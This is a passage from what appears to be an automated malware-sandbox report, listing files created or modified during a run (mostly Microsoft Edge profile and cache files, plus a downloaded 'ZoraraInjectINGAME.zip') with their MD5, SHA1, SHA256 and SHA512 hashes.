| SHA512 | 5f983312ab3bf7004cd2faba7be4e47585507d9951420247cf2a34414f85814670ed08581740df390616248fa1a103d2be1e34fe600b1471eea5c6419e82f903 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
| MD5 | c494f977022fc2f9daecbb33c25f4e6e |
| SHA1 | ce84fb64ecf49ee2f7a57a556c5a1620587dfd44 |
| SHA256 | 704666025d2a8d868ed0368f2bde6657de18d620d5ba0bc4c881c2dd67ba17aa |
| SHA512 | afd68030de2b687803fc02148700d83a4459be9971298cc32174a2794ec30b9b6ab1005adeda48974e08e7ffc2c06aa7e495565bef4839beb9281eeb13194987 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | d965d768763c445ee2af08e4a7547db0 |
| SHA1 | 8b2aeeb2ba275d9292796ce5c05db531ca224d29 |
| SHA256 | 59a9ccfad954d5b683e312be21f8c5ca968c12d6fa17a1328351f18cab894464 |
| SHA512 | 7f4475cc2f5ac8f7325f0b3b05aba1eea4a0990de382dd54ab565a518952fe89ddec480bbac53eef724de605fad1945e3f5fe993d2b7323c6ca2f32cff85a3db |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 7fc6fe7aad0a7045374637a2e747791d |
| SHA1 | 402447970ef9f99539376f5729e2f842b2c53598 |
| SHA256 | 4867d33b989a597fc78c62354129c4210fdb19dbbf749d2c2f0e6ebda76db7a7 |
| SHA512 | 7fdac116942b3e5257593db74c5a9deb5b611fd7b0707c34c31212a2face0da9ff550d7a8b019176cd7b7b9141a450414862da0218264a406ef81d6d0c601a33 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 98056f242d6aa9a273c103a236199822 |
| SHA1 | aae36e861fcec7c5e05d85339e6a211b7cbd48a6 |
| SHA256 | 0fa9516e474bd78316f5cada0b2657216bbd80b0eeda60e3ae041049956d86a1 |
| SHA512 | 8d9f981971744eb6ef81388f935f0f008f44c7c030a212d3bd57c9d6d03429400bc85d61418a49c94f732be01db80e91c6b845a8a5804339e9aa50a77359f45c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | d9c404e05d240e168327792df07f1475 |
| SHA1 | 9c27896bb1041ab8f9aa29a662f533ca8ade063c |
| SHA256 | f397d40e744e6e359aa17589fa7b3c11f2cffc28b5d356d9097f0ebebefd1138 |
| SHA512 | dbff9662b1ff5e9bdae6359395957b805cb998a6b5971fbe3707daf978ee965df7ebe9a680eb9991ba02a6d3630890902fecba505c9b219e817862d7b5fe2ada |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 4d596bddb58a6429cc29197acddb92f0 |
| SHA1 | 7ca4bf874d21565d78c4dc29506e1a98f339febd |
| SHA256 | c3a4bdaa9f5771fe1cd0bf40cb36112bd814d5264418c48eb8e31592bb849357 |
| SHA512 | 831ff559bd812cb8ee7db3daf20e9ce64a5adbca67d76c3ca186729fc3adeb986707b81c2a7a028b55a6580af720d9e07c8992c3165cf91868047ca20be69404 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000e6
| MD5 | 07c96a74d8b7c866f4e4302f143c83f8 |
| SHA1 | 24172bdf415f15e5beb7ca4eb850f48b18c36d53 |
| SHA256 | 2e1ef1bab9c9b6d4d2203f6fd2af932e567888012594abb2dc00e09464e55df8 |
| SHA512 | 706d521efd2778e28d4cb9e327f02ae50b6a11fa0a3f74e5af2771c5343d57140c562dd77a1ceac6fb26536dc58b79f85c1be1b64738a1baae3e8eef1173e7d1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 7c21c92086f27e9c844488b55539b4c7 |
| SHA1 | b4da8d63f56e100dc9c2e9c35740dc4c4b72435a |
| SHA256 | 57f5acd771e2fb2719db13e80694c800b04774c5230d8f98662588ebccf5d1aa |
| SHA512 | 99f93b286ceb97e6b10e5ee480fc697e15268e93f7c963634c5fcee0e6c48e33b6062ba76107444437a01e86b0f0181fcc24d9f7e504bc6feaf73948ee6529fc |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
| MD5 | ddca800d9f0c76603ec333d631ef7d01 |
| SHA1 | 6d83ece797393f77c6623167fc051ed8681311a0 |
| SHA256 | 6d3b35e8bfa4fc37da8d49af6bc9259bac5c57a79baf00e84e83ab95f087b98c |
| SHA512 | a9362acc057125fbf7a26f8d45c6b3e16053e0f2a8825c26fe6a35bb16d653ea95b4ad74e27c9118228d9fb0251ebaf26747071cd2768e5af96be7ab89a3d8c0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 5466814f27ee12c6d05a8a1272c11d5b |
| SHA1 | a4caf4efa5600017ca3bf5a45e0e39c1ba6ccd9c |
| SHA256 | 54ca19349533edff78cac61c22131d2f0791997b2ba7f628646e6ce28f72b3d7 |
| SHA512 | 3b607d9030cf18734a2e5827eb42492ebbff0e0753c6a3e24ea0cfc523f11d6634c7ac3e9c491c43f16aea2eb5313e543d558529c6963edb3f77fb5ba3cd1cc6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\de4be3a2f187e38a_0
| MD5 | 49687176c68c0de71cf04f4a3705bf66 |
| SHA1 | c25972401f6797a73a400f7a4acd7cc9f5ca1c49 |
| SHA256 | cb3a57f07899d61565e784caf9c95c5e8c35ed7167a16d3f697567e408d4abf8 |
| SHA512 | 3ea33b67ac6a20c8e1c2d947cada764e6287f4f926c670b7b0a7e389b4b5d75232766a514c64fefef6cae68a987e790a07e47f7d439b3a70f1a52ba79c8e7f34 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\646762dcf2563f54_0
| MD5 | 558de28d5a5471b02e75a8310fbde5e4 |
| SHA1 | aff902ed55f24b425ace20c5fe8ea3dae1cd8ba1 |
| SHA256 | 8d6d22e1190de6ec8ef62d98dd77649f349d77d7a7108a308ab1b2de312d4a13 |
| SHA512 | 1424c3856ee35fe17892d4e878646d7036a57a94e9674ae0f60e8835964accce8bc8176b5f8457cfb2b1e998952d7c8622228ce761278f86cb73336ec439d5d4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 3dfe1a5e346aadbe7b7d001a8cc39c23 |
| SHA1 | faf9eeed0a08a2902c0dbf1aa5c1236581fddfff |
| SHA256 | 8fdf24deeaa7e278d96315b6b2c4278c610aa6a55f52deca525b15aa86a8630e |
| SHA512 | 70ca704d3102944dd269a97a6e30299e529582f280932a2c5145ed63deb2800be36fad3d35ea7a890d822d195df4192a3d7b884aba101e38b9b6c0c8adb3cb10 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 78f86f9002aca6094663abf4f08cdaa6 |
| SHA1 | 18a74d0585dc912d72e01c8e2d4794225a8e64ee |
| SHA256 | 21abc0a63ab1cf6372152cfaa761f48aeed8548aa45cd66f754d482ef1fca410 |
| SHA512 | 548d3ac842cb66e9a5823e25d2ccf7701b831d47b02a4fddcf77016b4ed0cb43c5aa37929294183c513bdf99291411f2c54fd24658497dd75d37a3aa9c77ab66 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | c3b964b1a5b38ecee60a9aa41496e15d |
| SHA1 | b9d3228e11cb359a6c6f92182e3f8ea5c1eda71d |
| SHA256 | fa92053023a0a3788194b79effb1c0449f1a9e53a550ef2bcef2609eb73094b2 |
| SHA512 | e6ab121f221e430321cf405a0f1c8bd197f34a1d0203a379688069a2ba234f0e56784cf80df6350daa8fc01b2d6bcb6c0154d4addbe76de85f656e0740d20209 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\d0b689e78daac921_0
| MD5 | 3d4cefccf3a937b570476cbbed12fc3d |
| SHA1 | 3668d1d02f4c2bb2dad866dca43ecefb09976dbf |
| SHA256 | 0676333ddbf6cdb7cdbd7000b9bd1e42b1aa11501ae30b1c0e9850bf91c9e505 |
| SHA512 | 428ea1373a2ea79c3e2080925c8622a09f4bb869d1bf71b11be6072bb264adfa67c495e916c3d3825931f4d6ffc5e798bc82e78861ea5152c0ce9aff37126b2d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\c399cca45299b6fc_0
| MD5 | 5b1a7a6ef828ac876506211c55f4e8e5 |
| SHA1 | 42514591f185cb906e875321dfdc8f0a0389178b |
| SHA256 | 561c0cfad3c806f191eb24c13d3226d7df9081e6d8eaf2bf8c76cc3300275e7b |
| SHA512 | 7ae097d0c0d781a5e2ef12c353ff5a3a68d4e9bbe35d794b1afe4557c1609099ce31748ccab483e9e214246b251a588d0a6476c49097dad590701a34700fa8f5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 8e61509a74372d41c65c8609f846ea24 |
| SHA1 | 77c6fac18bb322fc6d9744f225eb30aaffcc9791 |
| SHA256 | 18b4bd1cb938250d091dfba82f41b2f2fa85e0e4caf7236c47b6e20bd41a3643 |
| SHA512 | 28848e1efb432f5ee09fea31507fffc1fc8b79121357407a2e4efbc2e3c30dcac023070f29728ed12de4e01dfaee13ae2b34e950fbd7e66334225935fb43e185 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 67b10693b868ed191c6e791580cdef74 |
| SHA1 | 1c2f752c203eb468d73a4f195816b3e2067dbb96 |
| SHA256 | 3e7d3632774d17290c744772d7066be0c4d312eeef3869e7536fc6be25b1006e |
| SHA512 | dcc3ee4af1527d968c13f5a3495056ca9275fdd862353ddf5307a464548563e686f96831da7c9339991f3e893b86d7c042088c12221e7448cdfd01c8130e1b28 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000143
| MD5 | 1dc06492f582bfc9afc32518c5b669a8 |
| SHA1 | 3ceb77de90dfc8ad8a38e8df30f44ccafc5a074b |
| SHA256 | 4cca2caca18dd3689fce9fdb2b27bd6bf9e779967f12ae9c8c0d4666c1e4c2a1 |
| SHA512 | 80114c72ce7ac3493602db99d3b042c928dafbe7fe2d43e8f5e9d273cec0289c6c4742b9cf55a38df4a0bb9376c68ac9fb0ab3e8a6de292bf62dfb6a0c4f9e78 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00014a
| MD5 | 0d7efacbf81f99f9b3b82ac627cc34cc |
| SHA1 | 54ba921739b19ff14708d61bf424e4713a51cce8 |
| SHA256 | ee19dc2db1f7d41b35f1a8bd976f452d5fd58012d0eff83c53fb835a4ffd8764 |
| SHA512 | cf8b4b0f8f586c1ac11d220b4033f91a3a98f167110bae904947407a8b4896afe18bef08871d09f6a2634d58a7118345e90a358b386d889f83abb246d8b6e44a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | a9b2bebab5394351576a2c07ce3ba3d7 |
| SHA1 | 743603ae5dcaaf2ff29f1209e2d39be8e6d60c25 |
| SHA256 | 5f13e52c8222dc05a323db82f45f7e1e0bbaec53a814d017ab871f10efb400e6 |
| SHA512 | 002d0bc47cd04772d240917864fa17b62e845350393c9f479de114d0f88335baa04bb2d20c0de87df572185bcce8a12ed4a34361749bffadf83fb32a4ea4abba |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00012c
| MD5 | b1419f76a0d1c480d2cb02be901d3489 |
| SHA1 | 2ef39078ecb443234caf9865255b66179fa4e670 |
| SHA256 | 5d6398942564659dd9fdb8cb7b366d9c90c46fcd0285b6783c2fe020638e63cb |
| SHA512 | fbc0bbd3b4055567410d64f0f41d8b9f8f2507bbb68bcfd35eeda2f7b54e749a639bd9143bd5b33bbdf6cdf63c54459e93c72fe1b24792a3f36428984648a0ac |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000133
| MD5 | c863c96c4f2b5e4713001bc5e432b650 |
| SHA1 | 5309b676013f3a3d83fd7775b86dfbc5e3e17e41 |
| SHA256 | f97200b90bd7b5be4f494283791d231abb2071ebcafd869b379a4f7c308871fd |
| SHA512 | 2f6d41f02a692927c7bc5700e694cc6bd998953c80993f12c5819e092a1228b0df9a314470fcec7338188039130e79d4cef799b77bc06cccbf9d3810e3fdda6e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000135
| MD5 | 87e8230a9ca3f0c5ccfa56f70276e2f2 |
| SHA1 | eb116c8fd20cb2f85b7a942c7dae3b0ed6d27fe7 |
| SHA256 | e18d7214e7d3d47d913c0436f5308b9296ca3c6cd34059bf9cbf03126bafafe9 |
| SHA512 | 37690a81a9e48b157298080746aa94289a4c721c762b826329e70b41ba475bb0261d048f9ab8e7301e43305c5ebf53246c20da8cd001130bf156e8b3bd38b9b8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000147
| MD5 | ea35549990f54b349e6508f4f4cac0e0 |
| SHA1 | 8efdec385374e1a3b51bfd29c3cc9315e7dc2df7 |
| SHA256 | 4a1c17a1326271540f84968f43e9f55f936ae9085e99a6d06592a53f98aeff2f |
| SHA512 | 67c956058c45810b4d06f4c3f2974c3b264289be435a06ca219df51cd51f9e25bbdf1db42c20d9f435f1689431b5106c21dff8a400ed6263a6b102dfb51ba7ea |
C:\Users\Admin\Downloads\ZoraraInjectINGAME.zip
| MD5 | 688e0d87ccdccd758d94f5ba1d82af1c |
| SHA1 | 35d2f0c993934129c150eb607191fff63f69007d |
| SHA256 | 197f056b0b1462d6a8d21b87f867a80f84b7136bd01eb9a8b9e78fabbb392879 |
| SHA512 | 5a280b7d8f598b35e6bf3500f1dcce0417b096ff36714abc1560b0feafcdd8f91ed70dc157a624dbc23ca594c7a4ace0d43894f13f39ac2ca2a602981160e048 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | fac7e26eaf282c7df90f73d83f498ed7 |
| SHA1 | 3bb9e4070028e5958bafc08090728069718293f3 |
| SHA256 | ab547a9c7867be808c289d3078d053b8b4909d7fdb876f93ca0cc89149e29047 |
| SHA512 | c2309a031c816ed36594aeead12089a709625f82d2aa2eeca1e0581166fba9449ea95adc25e79091025b45276562f912cc817748a19a14cb28f404586e8b0f68 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | aba05c9c43e22e444001de65d0a59036 |
| SHA1 | 36bdbc36b3b837aa69a40ca96248b21e66fdfab6 |
| SHA256 | dc0627e3750a9f616b4ce3667726934bfd29629d6b67033cd80dcd6481ed79b0 |
| SHA512 | 7a7f05f9e82ef515569b0ac12f4f359f435ec21da193dd5a9e820b750924af14f6fe3162c0d62a3bb4a9987b8acf6f38a50ac99d251343c3340a653f5a613516 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 8eb3a8d47ea0dde37720694ed482f428 |
| SHA1 | 8579f50191bdf23062c8c0bab81dcde5ee54ad66 |
| SHA256 | a57abd674341618bdee149e5e7cd3af7688442ed034ab8209b47484cfc8d00e6 |
| SHA512 | 6048e8dcbebfaf2bc1cefa700ae25d30bfee1944a40cd0237691bfe602087cd9a303e247420d2667a1278fdb2b40f0e592a296e8b1385bdae77ee30b1300f537 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000172
| MD5 | 677b9c3cb2f2ff88b99213e4ab1ef4db |
| SHA1 | 5709b933a9a6913b61d9a1cbed2ed46eb7d245df |
| SHA256 | 92b310eb42be5cb06d7fee43739b829e157177b3e71e06800047b759e2fa318c |
| SHA512 | 595f8c57c98e2998d0e6c704003334bf60ce32aa03673644364c94b52a0041aae0cc17d4c7a5a43fbca5b3b281f1749559010b4767c310919d762a9cae7f6637 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 19e40733f712652f86c773527a37e26a |
| SHA1 | bfe482d04e04a91406f8b9e7939d277fcc8e7554 |
| SHA256 | 01f0763972d5e59823ae87e430fb10e5181aa1b831ce8c7f52d68e75690b42c6 |
| SHA512 | 8cbe6497cc698b59cec48b6298282b2f6f30418ab8fb0863158458b811e600d183d318923f43fb933e28fa8b710c97057344f76ec84461f2efc092fc33b413e1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | b0bc9a921a1356802b73ddc010252911 |
| SHA1 | 78c6dd2088c6bc5f4feffd7bcaaed4af08332f1e |
| SHA256 | 191e42d0eeb7134a91b343240a2e3a3e45727ba475e2047a07c8b447f54247d5 |
| SHA512 | c89b7885b167fdee3c0424fe89a9320de7272632209e53131ba2727140cf5ae555c045db49d9698157a77cebca4b512090575b6f8abcfa64ce7730a682f37743 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 7a0706ae98624db371457139852ad53a |
| SHA1 | 4063eb0f78fcd82d4dfc34107c9a69f0ecf5efa9 |
| SHA256 | 3190ca145f1b45163c136da74ab7c959a0504a1f31012553f90096e6924e6055 |
| SHA512 | fcfcfa061e5fd4b2a3c987562222d391425118e0d713303b8a2efd09a9647cead42ab50e03a1c0a0bd6b35a0f79606f26254855dd8ef97b2976e1811886318f7 |